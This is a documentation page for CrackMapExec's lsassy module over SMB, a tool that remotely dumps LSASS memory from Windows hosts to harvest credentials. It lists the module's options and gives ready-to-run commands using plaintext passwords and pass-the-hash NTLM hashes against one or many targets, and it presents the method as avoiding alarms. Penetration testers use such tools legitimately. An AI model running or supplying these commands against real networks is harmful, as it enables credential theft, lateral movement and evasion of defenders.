CrackMapExec Lsassy (smb)

This page contains detailed information about how to use the lsassy CME module while using the smb protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.


This module dumps lsass process remotely using lsassy.exe, supporting multiple different methods. It also integrates with BloodHound out of the box, so that it can set the computer as owned in BloodHound automatically.

The lsassy module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.

Supported Protocols

  • smb

Module Source Code


Module Options

Here is a complete list of lsassy module options:

# cme smb -M lsassy --options
[*] lsassy module options:

            METHOD              Method to use to dump lsass.exe with lsassy. See lsassy -h for more details
            REMOTE_LSASS_DUMP   Name of the remote lsass dump (default: Random)
            PROCDUMP_PATH       Path to procdump on attacker host (Required for method 2)
            DUMPERT_PATH        Path to procdump on attacker host (Required for method 5)
            BLOODHOUND          Enable Bloodhound integration (default: false)
            NEO4JURI            URI for Neo4j database (default:
            NEO4JPORT           Listening port for Neo4j database (default: 7687)
            NEO4JUSER           Username for Neo4j database (default: 'neo4j')
            NEO4JPASS           Password for Neo4j database (default: 'neo4j')
            WITHOUT_EDGES       List of black listed edges (example: 'SQLAdmin,CanRDP', default: '')

Note that none of these options is required. If you want to change any of the default values, you can do so by adding, e.g. -o METHOD=VALUE parameter to the command line.

Module Usage

This is how to use the lsassy module while using the smb protocol:

# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M lsassy

Local admin:
# cme smb -u Administrator -p P@ss123 -d . -M lsassy
# cme smb -u Administrator -p P@ss123 --local-auth -M lsassy

Domain user:
# cme smb -u bkpadmin -p P@ss123 -d target.corp -M lsassy

CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:

# cme smb -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M lsassy
# cme smb -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M lsassy
The lsassy module can be also used against multiple hosts. Here's how to run it against multiple hosts:

# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M lsassy
# cme smb -u Administrator -p P@ss123 -d . -M lsassy
# cme smb -u Administrator -p P@ss123 -d . -M lsassy



This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.